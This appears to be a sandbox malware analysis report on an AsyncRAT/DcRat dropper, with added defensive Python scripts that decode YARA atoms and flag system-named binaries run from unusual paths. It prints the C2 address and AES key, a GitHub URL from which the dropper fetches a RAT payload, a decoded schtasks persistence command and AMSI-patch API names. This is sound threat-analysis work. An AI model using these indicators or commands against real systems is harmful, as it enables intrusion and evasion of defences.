Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
Analysis ID: 1522429
MD5: e40eb702f369e5decfb33b3d78bd4b0c
SHA1: 3de25a909a7d8f20aaa4d9aba60aeb501c247f86
SHA256: 16a2abe3f4f2c005e206318caf37a366e0084fa8ca8561f3642fa0b4f2f04a7e
Tags: exe

Detection

AsyncRAT, DcRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
Yara detected DcRat
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup

Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Extracted malware configuration (AsyncRAT):
{"Server": "37.18.62.18", "Ports": "8060", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "RuntimeBroker.exe", "AES_key": "Wd0QrNKKApZ7VsN4yQvJ31HLn2KfmGAC", "Mutex": "RuntimeBroker.exe", "Certificate": "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", "ServerSignature": "bCiXv7J8PRadRPbRtO2V1U6jkfGOSIfLKIPU7qgUIMavqn7dKm3yC1zdRY+XJSVGuWOv+7CTurKpLtZpKaqGMoPUWFA5GxowHBoNkBGlURBNr42X/hDXROGJu5BE++gclzr2uNznxCAIwaRL3ohSFmknkpknGbPcYZTot2Q6ldw=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "RuntimeBroker", "AntiProcess": "false", "AntiVM": "true"}
Source: sslproxydump.pcap | Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
Strings:
  • 0x9658:$a1: havecamera
  • 0xd031:$a2: timeout 3 > NUL
  • 0xd051:$a3: START "" "
  • 0xcedc:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0xcf91:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==

Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Rule: JoeSecurity_AsyncRAT | Description: Yara detected AsyncRAT | Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | Rule: JoeSecurity_AsyncRAT | Description: Yara detected AsyncRAT | Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
Strings:
  • 0x65f7:$a1: havecamera
  • 0x9ae4:$a2: timeout 3 > NUL
  • 0x9b04:$a3: START "" "
  • 0x998f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0x9a44:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
Strings:
  • 0x65f7:$a1: havecamera
  • 0x9ae4:$a2: timeout 3 > NUL
  • 0x9b04:$a3: START "" "
  • 0x998f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0x9a44:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts | Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. | Author: ditekSHen
Strings:
  • 0x9a44:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
  • 0x998f:$s2: L2Mgc2NodGFza3MgL2
  • 0x990e:$s3: QW1zaVNjYW5CdWZmZXI
  • 0x995c:$s4: VmlydHVhbFByb3RlY3Q
[5 further dropped-file entries are not expanded in this export]

Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp | Rule: JoeSecurity_AsyncRAT | Description: Yara detected AsyncRAT | Author: Joe Security
Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp | Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
Strings:
  • 0x63f7:$a1: havecamera
  • 0x98e4:$a2: timeout 3 > NUL
  • 0x9904:$a3: START "" "
  • 0x978f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0x9844:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
Source: 00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
Strings:
  • 0x1ecec:$b2: DcRat By qwqdanchun1
Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_DcRat_2 | Description: Yara detected DcRat | Author: Joe Security
Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
Strings:
  • 0x54e8:$b1: DcRatByqwqdanchun
  • 0x29e0bc:$b2: DcRat By qwqdanchun1
[3 further memory-dump entries are not expanded in this export]

Source: 3.0.RuntimeBroker.exe.610000.0.unpack | Rule: JoeSecurity_AsyncRAT | Description: Yara detected AsyncRAT | Author: Joe Security
Source: 3.0.RuntimeBroker.exe.610000.0.unpack | Rule: Windows_Trojan_DCRat_1aeea1ac | Description: unknown | Author: unknown
Strings:
  • 0x65f7:$a1: havecamera
  • 0x9ae4:$a2: timeout 3 > NUL
  • 0x9b04:$a3: START "" "
  • 0x998f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0x9a44:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
Source: 3.0.RuntimeBroker.exe.610000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts | Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. | Author: ditekSHen
Strings:
  • 0x9a44:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA
  • 0x998f:$s2: L2Mgc2NodGFza3MgL2
  • 0x990e:$s3: QW1zaVNjYW5CdWZmZXI
  • 0x995c:$s4: VmlydHVhbFByb3RlY3Q
Source: 3.0.RuntimeBroker.exe.610000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Description: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
Strings:
  • 0x9cc6:$q1: Select * from Win32_CacheMemory
  • 0x9d06:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x9d54:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x9da2:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
Source: 3.0.RuntimeBroker.exe.610000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy | Description: Detects executables containing the string DcRatBy | Author: ditekSHen
Strings:
  • 0xa13e:$s1: DcRatBy
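
Editor's note on the YARA hits above. The $a4/$a5 and $s1..$s4 atoms are base64 of the plaintext constants the AsyncRAT/DcRat code base (DcRat is an AsyncRAT fork, which is why both families' rules fire on one file) decodes at runtime: $a4 is `/c schtasks /create /f /sc onlogon /rl highest /tn ` (the scheduled-task persistence AsyncRAT uses when it runs elevated), $a5 is `SOFTWARE\Microsoft\Windows\CurrentVersion\Run\` (the Run-key fallback), and $s3/$s4 are `AmsiScanBuffer` and `VirtualProtect`, the two names needed for the usual in-memory AMSI patch. $a2/$a3 (`timeout 3 > NUL`, `START "" "`) are the batch stub the client writes to relaunch itself from the install path. The rules match on the encoded form because that is what sits in the binary; $s2..$s4 are deliberately truncated prefixes so they hit regardless of base64 padding. Note that this sample's config has "Autorun": "false", so the persistence code is present but not enabled in this build. The following script, added here and not part of the Joe Sandbox report or of the Elastic/ditekSHen rules, decodes those atoms and locates them in a constructed byte buffer the way the string table above does; the buffer and its offsets are made up for the demonstration.

```python
"""
Decode the base64 atoms behind the DCRat / INDICATOR_SUSPICIOUS_EXE_B64_Artifacts
YARA hits and locate them in a byte buffer the way a string-based rule does.
Added example; not Joe Sandbox, Elastic or ditekSHen code.
"""
from typing import List, Tuple

# Atoms copied verbatim from the report's string matches ($a4, $a5, $s2..$s4;
# $s1 is $a5 without its "==" padding). $s2..$s4 are truncated prefixes,
# exactly as the rule uses them.
ATOMS = {
    "$a4": "L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g",
    "$a5": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==",
    "$s2": "L2Mgc2NodGFza3MgL2",
    "$s3": "QW1zaVNjYW5CdWZmZXI",
    "$s4": "VmlydHVhbFByb3RlY3Q",
}

_B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def decode_atom(atom: str) -> str:
    """Decode a base64 atom that may be unpadded or cut in the middle of a group.

    Standard decoders reject odd-length input; a rule atom is often a prefix of
    the full constant, so decode bit-wise and drop the incomplete tail byte.
    """
    bits = "".join(format(_B64.index(c), "06b") for c in atom.rstrip("="))
    usable = len(bits) - len(bits) % 8
    raw = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    return raw.decode("latin-1")


def find_atoms(buf: bytes) -> List[Tuple[str, int, str]]:
    """Return (atom name, offset, decoded text) for every occurrence in buf,
    mirroring the offset:$name table a YARA match prints."""
    hits = []
    for name, atom in ATOMS.items():
        needle = atom.encode("ascii")
        start = 0
        while (off := buf.find(needle, start)) != -1:
            hits.append((name, off, decode_atom(atom)))
            start = off + 1
    return sorted(hits, key=lambda h: (h[1], h[0]))


# Constructed stand-in for an unpacked .NET image: filler bytes with the same
# base64 constants embedded. Offsets are arbitrary, not the report's.
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62                                 # 64 bytes of header filler
    + ATOMS["$a4"].encode() + b"\x00" * 8                # $s2 is a prefix of $a4, same offset
    + ATOMS["$a5"].encode() + b"\x00" * 8
    + ATOMS["$s3"].encode() + b"=" + b"\x00" * 8         # full constant is the atom plus "="
    + ATOMS["$s4"].encode() + b"="
)

if __name__ == "__main__":
    for name, off, text in find_atoms(SAMPLE_IMAGE):
        print(f"0x{off:x}:{name}: {text!r}")
```

Running it prints the same shape of table as the report (offset, atom name, and now the decoded meaning). Run `find_atoms` over a real unpacked image and the offsets will line up with the ones YARA reports, which is a quick way to confirm a hit is the persistence/AMSI code path and not a coincidental base64 blob.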

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, ProcessId: 4976, TargetFilename: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, ParentProcessId: 4976, ParentProcessName: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, ProcessId: 3420, ProcessName: RuntimeBroker.exe
            No Suricata rule has matched
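
Editor's note on the two Sigma hits above. Both fire on the same fact: a file named RuntimeBroker.exe, a name Windows only ever runs from C:\Windows\System32, is written to the user's %Temp% by the submitted sample (Sysmon EventID 11, PID 4976) and then started from there (PID 3420) with the sample as parent; the two rule titles are the ones listed under Signatures ("Files With System Process Name In Unsuspected Locations" and "System File Execution Location Anomaly"). The script below, added here and not the Sigma rules themselves (which carry a longer name list and several documented exclusions), is a simplified re-implementation of that check run over three constructed Sysmon-style events: the two from the report and one benign control for the real RuntimeBroker.exe (its PID and parent are made up).

```python
"""
Simplified version of the check behind the two Sigma hits: a Windows system
binary name created (EventID 11) or executed (EventID 1) outside the system
directories. Added example, not the Sigma rules' own logic.
"""
import ntpath
from typing import List, Optional, Tuple

# Binaries Windows only runs from its system directories. Constructed subset.
SYSTEM_BINARY_NAMES = {
    "runtimebroker.exe", "svchost.exe", "lsass.exe", "csrss.exe", "smss.exe",
    "winlogon.exe", "wininit.exe", "services.exe", "dllhost.exe", "conhost.exe",
    "taskhostw.exe", "spoolsv.exe", "sihost.exe", "dwm.exe",
}

# Where those names are legitimate (lower-cased prefix match).
LEGIT_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
)


def is_anomalous_path(path: str) -> bool:
    """True when a system-binary name sits outside the system directories."""
    p = path.lower()
    return ntpath.basename(p) in SYSTEM_BINARY_NAMES and not p.startswith(LEGIT_PREFIXES)


def check_event(ev: dict) -> Optional[str]:
    """Apply the check to one Sysmon-style event; None when nothing is wrong."""
    if ev["EventID"] == 11 and is_anomalous_path(ev["TargetFilename"]):
        return (f"system-named file created outside system dirs: {ev['TargetFilename']} "
                f"(writer PID {ev['ProcessId']}, {ev['Image']})")
    if ev["EventID"] == 1 and is_anomalous_path(ev["Image"]):
        return (f"system-named binary executed outside system dirs: {ev['Image']} "
                f"(PID {ev['ProcessId']}, parent {ev.get('ParentImage', '?')})")
    return None


def scan(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (ProcessId, verdict) for every event that trips the check."""
    return [(ev["ProcessId"], v) for ev in events if (v := check_event(ev))]


# Constructed events: the two from the report's Sigma section, plus a benign
# control for the real RuntimeBroker.exe (PID 1234 and its parent are made up).
EVENTS = [
    {"EventID": 11, "ProcessId": 4976,
     "Image": r"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"},
    {"EventID": 1, "ProcessId": 3420,
     "Image": r"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe"},
    {"EventID": 1, "ProcessId": 1234,
     "Image": r"C:\Windows\System32\RuntimeBroker.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for pid, verdict in scan(EVENTS):
        print(pid, verdict)
```

The path check alone is what the report's rules key on; in production a parent check is a cheap second signal, since the genuine RuntimeBroker.exe is launched by svchost.exe (DcomLaunch), never by a user-profile executable. Expect some noise from installers that stage system-named files under %Temp% before copying them, which is why the real rules carry exclusions.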


            AV Detection

Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: 3.0.RuntimeBroker.exe.610000.0.unpack | Malware Configuration Extractor: AsyncRAT {"Server": "37.18.62.18", "Ports": "8060", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "RuntimeBroker.exe", "AES_key": "Wd0QrNKKApZ7VsN4yQvJ31HLn2KfmGAC", "Mutex": "RuntimeBroker.exe", "Certificate": "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", "ServerSignature": "bCiXv7J8PRadRPbRtO2V1U6jkfGOSIfLKIPU7qgUIMavqn7dKm3yC1zdRY+XJSVGuWOv+7CTurKpLtZpKaqGMoPUWFA5GxowHBoNkBGlURBNr42X/hDXROGJu5BE++gclzr2uNznxCAIwaRL3ohSFmknkpknGbPcYZTot2Q6ldw=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "RuntimeBroker", "AntiProcess": "false", "AntiVM": "true"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | Virustotal: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Virustotal: Detection: 72%
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | ReversingLabs: Detection: 44%
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Virustotal: Detection: 58%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb%% | source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb | source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
Source: global traffic | TCP traffic: 192.168.2.6:49713 -> 37.18.62.18:8060
Source: Joe Sandbox View | IP Address: 140.82.121.3
Source: Joe Sandbox View | IP Address: 185.199.111.133
Source: Joe Sandbox View | ASN Name: FLEXLTD-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 37.18.62.18 (this line is repeated 50 times in the original report)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Code function: 0_2_00007FF6517916C0 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,InternetReadFile,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,InternetCloseHandle,InternetCloseHandle,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ
Source: global traffic | HTTP traffic detected: GET /errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe HTTP/1.1 | User-Agent: ProgramDownloader | Host: github.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe HTTP/1.1 | User-Agent: ProgramDownloader | Cache-Control: no-cache | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: RuntimeBroker.exe, 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/3;C
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/D;
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612612426.000001FDB6A0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612612426.000001FDB6A1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | String found in binary or memory: https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exeProgramDownloade
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A76000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exer
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612736367.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455219396.000001FDB6A5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/a
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/e.b
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A8F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612612426.000001FDB6A1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612801980.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exe0
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455144712.000001FDB6A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeA4z
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exeWYL
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exemYj
Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000003.4455060612.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe, 00000000.00000002.4612956931.000001FDB6AD4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/errias/XWorm-Rat-Remote-Administration-Tool-/main/XWormUI.exetXa
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
